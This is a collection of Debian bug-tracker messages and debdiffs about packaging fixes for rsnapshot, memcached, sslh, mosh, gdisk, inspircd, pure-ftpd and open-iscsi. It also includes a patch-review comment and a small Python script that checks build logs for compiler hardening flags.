I've tested the fix by defining ssh_args in /etc/rsnapshot.conf and it works well after the fix (before applying the update rsnapshot fails with "rsync: Failed to exec /usr/bin/ssh -p222: No such file or directory").

>
> Regards,
>
> Adam
>

-- 
Guillaume Delacour
diff -Nru rsnapshot-1.3.1/debian/changelog rsnapshot-1.3.1/debian/changelog --- rsnapshot-1.3.1/debian/changelog2013-07-08 22:54:57.0 +0200 +++ rsnapshot-1.3.1/debian/changelog2015-10-25 23:39:03.0 +0100 @@ -1,3 +1,13 @@ +rsnapshot (1.3.1-4+deb8u1) jessie; urgency=medium + + * debian/patches/14_fix_rsh_args: fix regression on --rsh with args: +Applied patch from Upstream to fix --rsh command line arguments with quotes. +The --rsh=... argument to rsync was erroneously quoted when added to the +@rsync_long_args_stack with options set. Thanks Jonas Genannt for the +help. + + -- Guillaume Delacour <g...@iroqwa.org> Sun, 25 Oct 2015 23:33:28 +0100 + rsnapshot (1.3.1-4) unstable; urgency=low * debian/patches/01_rsnapshot_conf: Refresh patch to fix path of rsnapshot in diff -Nru rsnapshot-1.3.1/debian/patches/14_fix_rsh_args.diff rsnapshot-1.3.1/debian/patches/14_fix_rsh_args.diff --- rsnapshot-1.3.1/debian/patches/14_fix_rsh_args.diff 1970-01-01 01:00:00.0 +0100 +++ rsnapshot-1.3.1/debian/patches/14_fix_rsh_args.diff 2015-10-25 23:38:18.0 +0100 
@@ -0,0 +1,18 @@ +From: Edwin Mons <g...@home.mons.net> +Date: Wed, 18 Sep 2013 22:39:11 +0200 +Subject: Fix rsync --rsh command line arguments with quotes +Bug: https://github.com/rsnapshot/rsnapshot/commit/30380587aeab201311af9428f7c47621ade691c8 + +diff --git a/rsnapshot-program.pl b/rsnapshot-program.pl +index 85972fd..5a20d0b 100755 +--- a/rsnapshot-program.pl b/rsnapshot-program.pl +@@ -3412,7 +3412,7 @@ sub rsync_backup_point { + + # if we have any args for SSH, add them + if ( defined($ssh_args) ) { +- push( @rsync_long_args_stack, "--rsh=\"$config_vars{'cmd_ssh'} $ssh_args\"" ); ++ push( @rsync_long_args_stack, "--rsh=$config_vars{'cmd_ssh'} $ssh_args" ); + + # no arguments is the default + } else { diff -Nru rsnapshot-1.3.1/debian/patches/series rsnapshot-1.3.1/debian/patches/series --- rsnapshot-1.3.1/debian/patches/series 2013-07-08 22:27:41.0 +0200 +++ rsnapshot-1.3.1/debian/patches/series 2015-10-25 23:33:09.0 +0100 @@ -8,3 +8,4 @@ 11_lvm_snapshots.diff 12_include_conf_with_arguments.diff 13_print_warn.diff +14_fix_rsh_args.diff signature.asc Description: OpenPGP digital signature
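Review bot: the header of 14_fix_rsh_args.diff puts the upstream commit URL in `Bug:`, which is meant for a bug report; an upstream commit belongs in an `Origin: upstream, <url>` field, with `Bug-Debian:` pointing at the Debian report the upload addresses. In the rsnapshot-program.pl hunk, the one-line change is only right as long as @rsync_long_args_stack reaches rsync as a list and never through a shell, so a comment on the `push` saying that the value must stay unquoted for that reason would keep the quotes from being put back in a later refresh.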
Bug#789835: memcached: FTBFS in sid: timeout in t/lru-crawler.t
On Mon, 29 Jun 2015 22:40:01 +0200 Guillaume Delacour g...@iroqwa.org wrote:

This package FTBFS in a clean sid sbuild setup:

t/line-lengths.t . ok
Timeout.. killing the process
t/lru-crawler.t .. Failed 126/221 subtests

Seems to be a random issue that affect other distributions (i'm quite sure to have been reproduced at least one time a long time ago, but wrongly guess this was my env):
http://forums.famillecollet.com/viewtopic.php?id=3165
https://code.google.com/p/memcached/issues/detail?id=398
http://webcache.googleusercontent.com/search?q=cache:2j2npL8eOAMJ:https://arch-ci.org/extra/memcached/log/+cd=10hl=frct=clnk

I've opened issue on upstream googlecode (as GitHub memcached space don't let me create issues) to have his point of view about this issue.

Upstream and I can't reproduce the problem, can you? I tried to iterate around 250 times on this test and never reproduced it.

$ while true ; do prove t/lru-crawler.t ; done

If you reproduce it, don't hesitate to give me as many details as possible so that I or upstream can reproduce it and fix this issue.

-- 
Guillaume Delacour
signature.asc Description: OpenPGP digital signature
Bug#717451: Backups broken when ssh_args are set
fixed 717451 1.4.0-1
thanks

On Wed, 15 Jul 2015 19:42:21 -0400 Michel synth17+deb-b...@gmail.com wrote:

Package: rsnapshot
Version: 1.3.1-7
Followup-For: Bug #717451

Dear Maintainer,

After upgrading rsnapshot to 1.3.1-7, remote backups still fail. Local backups work as expected. The upgrade occurred on 06/24/2015, and every remote backup since then have failed. Have been extremely busy and have not checked local email, until today. To my surprise, have no remote backups since 06/24.

I've pushed the 1.4.0-1 release that fixes that kind of problem. Feel free to reopen if it is not the case.

-- 
Guillaume Delacour
signature.asc Description: OpenPGP digital signature
Bug#686956: incompatible with sslh
reassign 686956 mosh
fixed 686956 1.2.4.95rc2-1
thanks

Hi,

I'm reassigning this bug only to mosh and document the version which include the binding option.

On Tue, 30 Apr 2013 10:05:21 -0400 Keith Winstein kei...@mit.edu wrote:

This is fixed in git (adding a new mosh option, --bind-server=ANY) and will be in the next release.

On Fri, Sep 7, 2012 at 12:12 PM, chrysn chr...@fsfe.org wrote:

Package: mosh, sslh
Severity: minor

mosh can't be used on hosts that hide their ssh services behind sslh. when connecting to such a host, mosh displays

mosh: Nothing received from server on UDP port 60001.

then:

mosh: Nothing received from server on UDP port 60001. (... s without contact)

the problem seems to be caused by the way the ssh connection is established in sslh: sslh forwards the connection by creating another tcp stream from itself to the ssh server, causing SSH_CONNECTION have 127.0.0.1 in both source and destination ip fields -- and mosh, when started with -s, binds to the address it finds in SSH_CONNECTION. the mosh server seems to get started with -s automatically (even though the client seems to just call mosh-server, it shows up in the process list as `mosh-server new -s ...`).

several solutions seem feasible, in increasing order of my preference:

* provide a way for the client to specify he doesn't want to use the `-s` option server-side (fix on mosh side)
* have a server-side configuration option to turn off the `-s` flag for the host (better, as it has to be done only once per host) (fix on mosh side)
* provide a way to find out the real address (fix on ssh side)

as a workaround, i have provided a way around sslh for clients to connect directly, but that's not usually what an sslh user wants to do.

-- System Information:
Debian Release: wheezy/sid
APT prefers unstable
APT policy: (500, 'unstable'), (1, 'experimental')
Architecture: amd64 (x86_64)
Foreign Architectures: i386

Kernel: Linux 3.4-trunk-amd64 (SMP w/2 CPU cores)
Locale: LANG=en_GB.UTF-8, LC_CTYPE=en_GB.UTF-8 (charmap=UTF-8)
Shell: /bin/sh linked to /bin/dash

Versions of packages mosh depends on:
ii libc6 2.13-35
ii libgcc1 1:4.7.1-7
ii libio-pty-perl 1:1.08-1+b2
ii libprotobuf7 2.4.1-3
ii libstdc++6 4.7.1-7
ii libtinfo5 5.9-10

signature.asc Description: OpenPGP digital signature
Bug#789835: memcached: FTBFS in sid: timeout in t/lru-crawler.t
forwarded 789835 https://code.google.com/p/memcached/issues/detail?id=417
thanks

On Wed, 24 Jun 2015 22:02:48 +0100 Dominic Hargreaves d...@earth.li wrote:

Source: memcached
Version: 1.4.24-1
Severity: serious
Justification: FTBFS

Hi,

This package FTBFS in a clean sid sbuild setup:

t/line-lengths.t . ok
Timeout.. killing the process
t/lru-crawler.t .. Failed 126/221 subtests

Seems to be a random issue that affect other distributions (i'm quite sure to have been reproduced at least one time a long time ago, but wrongly guess this was my env):
http://forums.famillecollet.com/viewtopic.php?id=3165
https://code.google.com/p/memcached/issues/detail?id=398
http://webcache.googleusercontent.com/search?q=cache:2j2npL8eOAMJ:https://arch-ci.org/extra/memcached/log/+cd=10hl=frct=clnk

I've opened issue on upstream googlecode (as GitHub memcached space don't let me create issues) to have his point of view about this issue.

Cheers,
Dominic.

signature.asc Description: OpenPGP digital signature
Bug#784357: memcached multi instance startup/shutdown broken
On Tue, 05 May 2015 21:02:26 +0300 Albertas Sileika a.sile...@gmail.com wrote:

Package: memcached
Version: 1.4.21-1.1
Severity: normal

Dear Maintainer,

Hi,

In wheezy there was possibility to start/stop multiple memcached instance via /etc/init.d/memcached. After upgrade to jessie this possibility is lost (without rewriting unit files).

You're absolutely right, we didn't have the time to work on this before the release. For now, I don't see any other possibility than writing another systemd unit file (but suggestions are welcome).

-- 
Guillaume Delacour g...@iroqwa.org
signature.asc Description: This is a digitally signed message part
Bug#774707: sslh: Installation of sslh breaks xinetd if clients are connected
tags 774707 + moreinfo
thanks

On Tuesday 06 January 2015 at 15:47 +0100, Fabian Kurz wrote:

The problem appears to be in line 32 of postinst:

# disable to force user to configure inetd mode
# and disable if standalone mode
update-inetd --disable https

This command appears to fail if there are existing connections to any xinetd service.

I use update-inetd to enable/disable the sslh service, and this utility seems (according to its description) not to support xinetd, but xinetd depends on it.

Anyway, I've tested this on jessie:
- install xinetd 1:2.3.15-3 (and update-inetd 4.43, by depends)
- enable echo service in /etc/xinetd.d/echo and connect to it
- install sslh 1.16-2, default standalone
- call update-inetd --disable https :

# update-inetd --disable https
# echo test | nc localhost 7
test
^C

My echo session was never disconnected by the removal of sslh, and the xinetd service always listens and accepts new connections on 7/tcp.

Can you reproduce the problem on Jessie?

-- 
Guillaume Delacour g...@iroqwa.org
signature.asc Description: This is a digitally signed message part
Bug#784915: jessie-pu: package rsnapshot/1.3.1-4
Package: release.debian.org
Severity: normal
Tags: jessie
User: release.debian@packages.debian.org
Usertags: pu

Hi,

I've introduced [1] in rsnapshot version 1.3.1-4 a problem which affects multiple user: when defining custom ssh_args they're not properly interpreted (erroneously quoted). This seems to be introduced by my refresh of the patch 10_space_destdir [2].

I can propose to fix the first problem by integrating the patch [3] i've prepared for a newer release of the package. Upstream has patched [4] rsnapshot as well.

If this is ok, i can prepare a package for stable.
Thanks in advance.

[1]: https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=717451
[2]: http://sources.debian.net/src/rsnapshot/1.3.1-4/debian/patches/10_space_destdir.diff/
[3]: http://sources.debian.net/src/rsnapshot/1.3.1-6/debian/patches/14_rsync_rsh_quoting.diff/
[4]: https://github.com/rsnapshot/rsnapshot/pull/15

-- System Information:
Debian Release: stretch/sid
APT prefers unstable
APT policy: (500, 'unstable')
Architecture: amd64 (x86_64)
Foreign Architectures: i386

Kernel: Linux 3.13.0-49-generic (SMP w/4 CPU cores)
Locale: LANG=C, LC_CTYPE=C (charmap=ANSI_X3.4-1968)
Shell: /bin/sh linked to /bin/dash
Init: unable to detect
Bug#717451: rsnapshot Backups broken when ssh_args are set
On Sunday 10 May 2015 at 03:14 +0200, John Paul Adrian Glaubitz wrote:
> Hello!

Hi,

> That debdiff is incomplete. The description in the changelog of the changes is insufficient and the actual patch is missing as well.
>
> Has this issue been fixed upstream already? If yes, we could just cherrypick the patch or upload a new upstream version.

I've asked the release team to include the patch for fixing this issue. I'm waiting for them to propose the fixed package (but I maybe have to include it into unstable before).

> Cheers,
> Adrian

--
Guillaume Delacour g...@iroqwa.org
Bug#780880: inspircd: CVE-2012-1836 patch incorrect
On Friday 20 March 2015 at 22:05 +, Adam wrote:
> Package: inspircd
> Version: 2.0.5-1+b1
> Severity: grave
> Tags: security
> Justification: user security hole
>
> Hi,
>
> I am an upstream maintainer for InspIRCd. The patch you have for CVE-2012-1836 (patches/03_CVE-2012-1836.diff) is not the same patch we released as part of 2.0.7 (there was no 2.0.6) to address the CVE.
>
> It appears to be a version of this commit: https://github.com/inspircd/inspircd/commit/9aa28f3730fb3dd69c1e06f78bb2bbc43d36c684. However this commit was never in a release, and was only in git for about 6 days (due to someone other than me pulling it in). I looked at the CVE and addressed it with two followup commits later.
>
> This commit and your patch do not fix the problem. You can still send maliciously crafted packets and cause remote code execution. This was fixed in https://github.com/inspircd/inspircd/commit/ed28c1ba666b39581adb860bf51cdde43c84cc89, prior to the 2.0.7 release.
>
> Furthermore, your patch introduces a buffer underflow where it has i =- 12 and not i -= 12. This causes it to start reading from before the packet's buffer. It is unclear to me what this can cause.
>
> Additionally, at the same time I committed 58c893e834ff20495d007709220881a3ff13f423 to prevent malicious packets from causing InspIRCd to infinite loop. This is not a part of the CVE as it does not allow remote code execution, but is still a critical problem due to the potential for denial of service.
>
> You should perhaps apply these two patches on top of your existing ones, or maybe fetch the dns.cpp file off of 2.0.7 here: https://github.com/inspircd/inspircd/blob/v2.0.7/src/dns.cpp. It does not change much.
>
> I would be willing to go through and provide a proper set of patches for this and other less-severe issues if requested. I do not want to do it up front because it would be a lot of work, and I am not sure whether or not it would be accepted. You have a very, very old InspIRCd version, and there is a lot of stuff to sift through (about 3 years). Let me know.

I'll try to apply the diff for src/dns.cpp between the 2.0.5 and 2.0.7 releases as you suggest and will test it (yes, I personally use inspircd). When done, I'll contact the Debian security team for an upload in the security archive.

As the new stable version Debian 8 Jessie is about to be frozen/released, I don't think I'll find a sponsor to upload a 2.0.17 backport of inspircd for the current Debian 7 Wheezy.

> Thanks,
> Adam
Bug#779797: gdisk: Returns exit code 1 after successful operations
severity 779797 serious
thanks

On Wednesday 04 March 2015 at 21:55 +0100, intrig...@debian.org wrote:
> Package: gdisk
> Version: 0.8.10-1
> Severity: important
> X-Debbugs-Cc: u...@451f.org
>
> Hi,

Hi,

> tl;dr:
>
> * In Wheezy, gdisk correctly returns exit code 0 upon success.
> * In Jessie, gdisk mistakenly returns exit code 1 after various successful operations. This breaks any tool that uses gdisk for such operations... and bothers checking its exit code. No idea if the reverse-dependencies in Debian are affected, but it does break Tails Installer (not in Debian yet, will be uploaded by the end of August) on Jessie.
> * This regression has been identified upstream in March, 2014. It was fixed in upstream Git back then. It's the HEAD of their master branch, and no release was put out since.
>
> The attached patchset imports the fix from upstream (not the entire commit, that sadly is non-atomic and contains unrelated changes -- just the relevant changes), and updates d/changelog accordingly. I've generated with git format-patch from the Vcs-Git.

I've also patched gdisk_test.sh to test return code of partition table creation, like you've made in your test.

> The attached reproducer script allows anyone to confirm the summary I made above. The results I see on Wheezy, Jessie, and Jessie + the upstream fix follow.
>
> With my Tails hat, I'd love to see this bug fixed in Jessie (otherwise we'll have to ship a modified gdisk in Tails).
>
> With my Debian hat, I'm unsure. On the one hand, arguably it's not RC, and if nobody reported this bug at this stage of the release cycle, then it's probably big deal to release with it, and not worth taking the risk to modify the package. On the other hand that's a nasty regression, and we don't know how many home-made scripts running under `set -e' will be broken once their authors upgrade their systems to Jessie.
>
> Guillaume, what do you think? If you feel it's RC, please bump severity. I can take care of NMU'ing and talking to the release team if it helps — just let me know.

I've prepared a fixed version on mentors: http://mentors.debian.net/debian/pool/main/g/gdisk/gdisk_0.8.10-2.dsc

It would be great if you can upload it to unstable and include it for Jessie (as I've bumped the severity to serious; I agree with you that without the upstream fix, it can break user scripts).

--
Guillaume Delacour g...@iroqwa.org
Bug#779797: gdisk: Returns exit code 1 after successful operations
On Thu, Mar 12, 2015 at 03:08:31PM +0100, intrigeri wrote:
> Hi Guillaume,
>
> Guillaume Delacour wrote (10 Mar 2015 21:51:39 GMT) :
>> I've also patched gdisk_test.sh to test return code of partition table creation, like you've made in your test.
>
> Great! Now, I don't see this change applied upstream, so it should *not* go into the same quilt patch as the one we've cherry-picked from upstream. Could you please fix that?

Split into two patches.

> Also, has this additional change been forwarded upstream yet? DEP-3 says Any value other than no or not-needed means that the patch has been forwarded upstream for the Forwarded field.

The shell script I've submitted upstream a few years ago needs to be modified with redundant if/else blocks. I'm not sure now how to modify all tests to check return codes. I consider my patch as a non-regression test only for this bug. This is why I've made the change in this way.

>> I've prepared a fixed version on mentors: http://mentors.debian.net/debian/pool/main/g/gdisk/gdisk_0.8.10-2.dsc
>
> I'm reviewing the one in the Vcs-Git. Hopefully it's the same. Note that the main goal of my review is to increase chances the resulting package is granted an unblock request.
>
> * Why was the Bug: DEP-3 field, that was in the patch I've proposed, removed?
> * Are you sure that the trailing comma in the DEP-3 Origin: field is legit?

I've totally imported your proposal and built a new -2 package.

> Other than these few nitpicking comments, it looks good \o/
>
>> It would be great if you can upload it to unstable and include it for Jessie (as i've bumped the severity to serious; i agree with you that without the upstream fix, it can break user scripts).
>
> I'll gladly do that once we agree on the content of the package to upload :)
>
> Cheers,
> --
> intrigeri

--
Guillaume Delacour
Bug#628659: [php-maint] Bug#628659: please support IPv6 connections
On Tue, 31 May 2011 12:51:49 +0200 martin f krafft madd...@debian.org wrote:
> forwarded 628659 http://pear.php.net/bugs/bug.php?id=18575
> tags 628659 upstream
> thanks
>
> thus spoke Thomas Goirand tho...@goirand.fr [2011.05.31.1105 +0200]:
>> While I'm ok to maintain the *package* for php-net-smtp (as being part of the pkg-php team), but I wont do any new code on it (just eventually fixing issues), especially new features. So best might be to send a bug report upstream (there's also a bug tracker at pear.php.net), or send a patch (here and upstream).
>
> Done.

The problem was in Net::Socket which is a Net::SMTP dependency. Anyway the problem was fixed on version 1.0.13 since 2013-05-22 (and Debian has now 1.0.14 and I've tested the smtp connection with php-net-smtp which is ok with this version).

I'll reassign this bug to php-net-socket and mark it fixed in corresponding version.

FYI, Net::Socket uses php fsockopen() and it first connects to IPv6 when available (not sure how it is managed in the php source code).

> --
> martin f. krafft madduck@d.o
Bug#743310: rsnapshot: Program calls with arguments containing quotations mark don't work anymore
On Monday 09 February 2015 at 23:07 +, Christoph Egger wrote:
> Package: rsnapshot
> Version: 1.3.1-4
> Followup-For: Bug #743310
>
> Hi!

Hi,

> Guess it has something to do with additional quoting. Makes rsnapshot mostly useless for me.

I'm sorry to have introduced such a problem by cherry-picking the upstream patch; the last known author is about to abandon the maintenance of rsnapshot (due to inactivity) to other users to fix some old code base of the software (https://github.com/bebehei/rsnapshot/issues/1).

I've missed the freeze deadline by trying to update rsnapshot to the last upstream git repo (there were lots of changes and improvements I wanted to be done and the project started to be inactive) and it is too late for this important fix. I'll try to look further on the take over to see what happens.

> /etc/rsnapshot.conf
> # ssh has no args passed by default, but you can specify some here.
> #
> ssh_args	-i /root/.ssh/id_rsa_backup
>
> /bin/cp -al /srv/rsnapshot/daily.0 /srv/rsnapshot/daily.1
> /usr/bin/rsync -ax --delete --numeric-ids --relative --delete-excluded \
>     --rsh=/usr/bin/ssh -i /root/.ssh/id_rsa_backup \
>     user@host:path \
>     /srv/rsnapshot/daily.0/entry/
> rsync: Failed to exec /usr/bin/ssh -i /root/.ssh/id_rsa_backup: No such file or directory (2)
> rsync error: error in IPC code (code 14) at pipe.c(85) [Receiver=3.1.1]
> rsync: connection unexpectedly closed (0 bytes received so far) [Receiver]
> rsync error: error in IPC code (code 14) at io.c(226) [Receiver=3.1.1]
>
> -- System Information:
> Debian Release: 8.0
> APT prefers testing
> APT policy: (500, 'testing')
> Architecture: amd64 (x86_64)
> Kernel: Linux 3.16.0-4-amd64 (SMP w/2 CPU cores)
> Locale: LANG=en_US.UTF-8, LC_CTYPE=en_US.UTF-8 (charmap=UTF-8)
> Shell: /bin/sh linked to /bin/dash
> Init: systemd (via /run/systemd/system)
>
> Versions of packages rsnapshot depends on:
> ii  liblchown-perl  1.01-2+b1
> ii  logrotate       3.8.7-1+b1
> ii  perl            5.20.1-5
> ii  rsync           3.1.1-2+b1
>
> Versions of packages rsnapshot recommends:
> ii  openssh-client [ssh-client]  1:6.7p1-3
>
> rsnapshot suggests no packages.
>
> -- Configuration Files:
> /etc/cron.d/rsnapshot changed [not included]
> /etc/rsnapshot.conf changed [not included]
>
> -- no debconf information
Bug#769261: sslh: FTBFS in jessie/i386: Build killed with signal TERM after 150 minutes of inactivity
On Wed, Nov 12, 2014 at 11:41:57AM +0100, Lucas Nussbaum wrote:
> Source: sslh
> Version: 1.16-2
> Severity: serious
> Tags: jessie sid
> User: debian...@lists.debian.org
> Usertags: qa-ftbfs-20141112 qa-ftbfs
> Justification: FTBFS in jessie on i386
>
> Hi,

Hi,

> During a rebuild of all packages in jessie (in a jessie chroot, not a sid chroot), your package failed to build on i386.
>
> Relevant part (hopefully):

You've missed a relevant part from the build log:

[...]
./sslh-select -v -f -u user --listen localhost:9002 --ssh ::1:9000 --ssl ::1:9001 -P /tmp/sslh_test.pid
ssh addr: localhost:9000. libwrap service: sshd family 10 10
ssl addr: localhost:9001. libwrap service: (null) family 10 10
listening on:
localhost:9002
localhost:9002
timeout: 2
on-timeout: ssh
listening to 2 addresses
localhost:9002:bind: Address already in use
[...]

Apparently, the bind of localhost:9002 fails on this machine, is there any other process listening on this socket ?

> ***Test: One SSL half-started then one SSH
> Connection refused
> ***Test: One SSH half-started then one SSL
> Connection refused
> cat: /tmp/sslh_test.pid: No such file or directory
> killing
> Can't kill a non-numeric process ID at ./t line 221.
> # Looks like your test exited with 1 before it could output anything.
> make[1]: *** [test] Error 1
> Makefile:99: recipe for target 'test' failed
> make[1]: Leaving directory '/«PKGBUILDDIR»'
> dh_auto_test: make -j1 test returned exit code 2
> make: *** [build] Error 2
> debian/rules:31: recipe for target 'build' failed
> dpkg-buildpackage: error: debian/rules build gave error exit status 2
>
> Build killed with signal TERM after 150 minutes of inactivity
>
> The full build log is available from: http://aws-logs.debian.net/ftbfs-logs/2014/11/12/sslh_1.16-2_jessie-i386.log
>
> A list of current common problems and possible solutions is available at http://wiki.debian.org/qa.debian.org/FTBFS . You're welcome to contribute!
>
> About the archive rebuild: The rebuild was done on EC2 VM instances from Amazon Web Services, using a clean, minimal and up-to-date chroot. Every failed build was retried once to eliminate random failures.

--
Guillaume Delacour
Bug#767034: sslh has USELIBWRAP off by default
fixed 767034 1.16-1
thanks

On Monday 27 October 2014 at 22:36 +0100, Christian Weinberger wrote:
> Package: sslh
> Version: 1.13b-3.2
> Severity: important
>
> Dear Maintainer,

Hi,

> sslh has USELIBWRAP off by default while openssh-server has libwrap support enabled by default in Debian. So sslh default is not in line with the openssh-server default, which is in my eyes not what I expected and therefore a security risk.
>
> Recommendation: Activate USELIBWRAP by default.

USELIBWRAP will be used in the next stable release 1.16-1 (and with LIBCAP for GNU/Linux): http://anonscm.debian.org/cgit/collab-maint/sslh.git/tree/debian/rules#n20

> Best regards,
> Christian
>
> -- System Information:
> Debian Release: 7.7
> APT prefers stable
> APT policy: (600, 'stable'), (500, 'testing'), (50, 'unstable')
> Architecture: amd64 (x86_64)
> Foreign Architectures: i386
> Kernel: Linux 3.16-0.bpo.2-amd64 (SMP w/2 CPU cores)
> Locale: LANG=de_DE.UTF-8, LC_CTYPE=de_DE.UTF-8 (charmap=UTF-8) (ignored: LC_ALL set to de_DE.UTF-8)
> Shell: /bin/sh linked to /bin/dash
>
> Versions of packages sslh depends on:
> ii  adduser       3.113+nmu3
> ii  debconf       1.5.49
> ii  libc6         2.19-11
> ii  libconfig9    1.4.8-5
> ii  lsb-base      4.1+Debian8+deb7u1
> ii  update-inetd  4.43
>
> Versions of packages sslh recommends:
> ii  apache2                      2.2.22-13+deb7u3
> ii  apache2-mpm-prefork [httpd]  2.2.22-13+deb7u3
> ii  dropbear [ssh-server]        2012.55-1.3
> ii  openssh-server [ssh-server]  1:6.0p1-4+deb7u2
>
> Versions of packages sslh suggests:
> ii  xinetd [inet-superserver]  1:2.3.14-7.1+deb7u1
>
> -- Configuration Files:
> /etc/default/sslh changed [not included]
>
> -- debconf information excluded
Bug#767039: FTBFS on GNU/Hurd
Package: memcached
Version: 1.4.21-1
Severity: normal

Just for the record, I tried to fix the FTBFS on GNU/Hurd:

* Temp-declare MAXPATHLEN memcached.c, just to continue the build
* Build finishes well but upstream test suite t/stats-conns.t fails on call of getpeername(2) on a UNIX domain socket as they're not supported on Hurd (pflocal/pf.c, S_socket_whatis_address). Maybe same problem in t/unixsocket.t.

I don't really understand why getpeername is called line 415, as tcp_transport is not tcp (need further investigations).

Help (and patches) welcome, work started on
Bug#764537: Hardening options incomplete: unapplied FORTIFY_SOURCE
Package: pure-ftpd
Version: 1.0.36-2
Severity: important
Tags: patch
User: hardening-disc...@lists.alioth.debian.org
Usertags: goal-hardening

Hello,

Hardened build features used through dpkg-buildflags are all used in the upstream build system (plus bindnow and pie). However, the FORTIFY_SOURCE CPPFLAGS is not applied because gcc optimizations are not used, see dpkg-buildflags(1) for more information.

Adding -O2 to CFLAGS in debian/rules seems to be sufficient to enable fortify_source.

Please also note that blhc reports false positives against build flags because upstream flags are not equal to Debian choices:

* CFLAGS
  + upstream: -fno-strict-aliasing -fno-strict-overflow -fstack-protector-all
  + dpkg-buildflags: -fstack-protector-strong -Wformat -Werror=format-security
* LDFLAGS
  + upstream: -z relro -z now
  + dpkg-buildflags: -Wl,-z,relro -Wl,-z,now
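The two conditions this report describes, a `_FORTIFY_SOURCE` define that stays inert because no optimisation level is in effect and the two spellings of the relro/bindnow linker options, can be checked in a build log as in this added example (not part of the original message and not blhc's code). The log lines and file names in it are constructed.

```python
import os
import re
import shlex

# Constructed sample build log; commands and file names are made up.
SAMPLE_LOG = """\
gcc -g -fstack-protector-all -D_FORTIFY_SOURCE=2 -c ftpd.c -o ftpd.o
gcc -g -O2 -fstack-protector-strong -Wformat -Werror=format-security -D_FORTIFY_SOURCE=2 -c log.c -o log.o
gcc -g -O2 -O0 -D_FORTIFY_SOURCE=2 -c debug.c -o debug.o
gcc -g -O2 -fstack-protector-strong -c nofortify.c -o nofortify.o
gcc -z relro -z now -o pure-ftpd ftpd.o log.o
gcc -Wl,-z,relro -o half ftpd.o
make[1]: Entering directory '/build'
"""

COMPILER = re.compile(r"(?:.*-)?(?:gcc|g\+\+|cc|c\+\+|clang(?:\+\+)?)(?:-[\d.]+)?")
OPT_FLAG = re.compile(r"-O([0-3sgz]|fast)?")
FORTIFY_DEF = re.compile(r"-D_FORTIFY_SOURCE=(\d)")
SOURCE_EXT = (".c", ".cc", ".cpp", ".cxx")


def opt_level(argv):
    """Return the effective -O level (the last one wins), or None if absent."""
    level = None
    for arg in argv:
        m = OPT_FLAG.fullmatch(arg)
        if m:
            level = m.group(1) or "1"  # a bare -O means -O1
    return level


def fortify_level(argv):
    """Return the effective _FORTIFY_SOURCE value, honouring a later -U."""
    level = None
    for arg in argv:
        m = FORTIFY_DEF.fullmatch(arg)
        if m:
            level = int(m.group(1))
        elif arg == "-U_FORTIFY_SOURCE":
            level = None
    return level


def linker_z_keywords(argv):
    """Collect -z keywords from both '-z kw' and '-Wl,-z,kw' spellings."""
    flat = []
    for arg in argv:
        flat.extend(arg[4:].split(",") if arg.startswith("-Wl,") else [arg])
    return {flat[i + 1] for i, tok in enumerate(flat[:-1]) if tok == "-z"}


def check_line(line):
    """Return the hardening findings for one build-log line."""
    try:
        argv = shlex.split(line)
    except ValueError:  # unbalanced quotes in a log line
        argv = line.split()
    if not argv or not COMPILER.fullmatch(os.path.basename(argv[0])):
        return []
    findings = []
    compiles = "-c" in argv or any(a.endswith(SOURCE_EXT) for a in argv[1:])
    links = not any(a in ("-c", "-S", "-E") for a in argv)
    if compiles:
        if not fortify_level(argv):
            findings.append("fortify-missing")
        elif opt_level(argv) in (None, "0"):
            # glibc only enables the fortified wrappers when optimising
            findings.append("fortify-inactive")
    if links:
        keywords = linker_z_keywords(argv)
        if "relro" not in keywords:
            findings.append("relro-missing")
        if "now" not in keywords:
            findings.append("bindnow-missing")
    return findings


def audit(log):
    """Return [(line_number, findings)] for every line with findings."""
    report = []
    for number, line in enumerate(log.splitlines(), start=1):
        findings = check_line(line)
        if findings:
            report.append((number, findings))
    return report


if __name__ == "__main__":
    for number, findings in audit(SAMPLE_LOG):
        print(number, ", ".join(findings))
```

Line 5 of the sample uses the plain `-z relro -z now` spelling and is accepted, which is the case the report says produces a false positive when only the `-Wl,` form is matched.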
Bug#764409: Hardening options incomplete
Package: open-iscsi
Version: 2.0.873+git0.3b4b4500-4
Severity: important
Tags: patch
User: hardening-disc...@lists.alioth.debian.org
Usertags: goal-hardening

Hello,

Please consider re-enabling the previously applied 03_hardened-build-flags.patch as open-iscsi is currently not fully hardened: missing PIE, relro and bindnow.

I've just refreshed the patch to add -fPIC to the open-isns library (see debdiff attached).

diff -Nru open-iscsi-2.0.873+git0.3b4b4500/debian/changelog open-iscsi-2.0.873+git0.3b4b4500/debian/changelog --- open-iscsi-2.0.873+git0.3b4b4500/debian/changelog 2014-09-01 11:03:23.0 +0200 +++ open-iscsi-2.0.873+git0.3b4b4500/debian/changelog 2014-10-07 22:48:32.0 +0200 
@@ -1,3 +1,11 @@ +open-iscsi (2.0.873+git0.3b4b4500-4.1) unstable; urgency=medium + + * Non-maintainer upload. + * Re-enable 03_hardened-build-flags.patch and refresh it to enable -dPIC +to utils/open-isns lib. + + -- Guillaume Delacour g...@iroqwa.org Sun, 21 Sep 2014 12:06:00 +0200 + open-iscsi (2.0.873+git0.3b4b4500-4) unstable; urgency=medium * [41c7eca] Introduce new architectures based on current build diff -Nru open-iscsi-2.0.873+git0.3b4b4500/debian/patches/03_hardened-build-flags.patch open-iscsi-2.0.873+git0.3b4b4500/debian/patches/03_hardened-build-flags.patch --- open-iscsi-2.0.873+git0.3b4b4500/debian/patches/03_hardened-build-flags.patch 2014-08-20 15:53:55.0 +0200 +++ open-iscsi-2.0.873+git0.3b4b4500/debian/patches/03_hardened-build-flags.patch 2014-10-07 22:45:27.0 +0200 @@ -1,9 +1,9 @@ hardened build flags - wheezy release goal -Index: open-iscsi/usr/Makefile +Index: open-iscsi-2.0.873+git0.3b4b4500/usr/Makefile === open-iscsi.orig/usr/Makefile 2013-11-05 20:56:40.013418719 +0530 -+++ open-iscsi/usr/Makefile 2013-11-05 20:56:40.009418719 +0530 -@@ -28,7 +28,7 @@ +--- open-iscsi-2.0.873+git0.3b4b4500.orig/usr/Makefile open-iscsi-2.0.873+git0.3b4b4500/usr/Makefile +@@ -28,7 +28,7 @@ IPC_OBJ=ioctl.o endif endif @@ -12,7 +12,7 @@ WARNFLAGS ?= -Wall -Wstrict-prototypes CFLAGS += $(OPTFLAGS) $(WARNFLAGS) -I../include -I. -I../utils/open-isns \ -D$(OSNAME) $(IPC_CFLAGS) -@@ -55,14 +55,14 @@ +@@ -55,14 +55,14 @@ all: $(PROGRAMS) iscsid: $(ISCSI_LIB_SRCS) $(INITIATOR_SRCS) 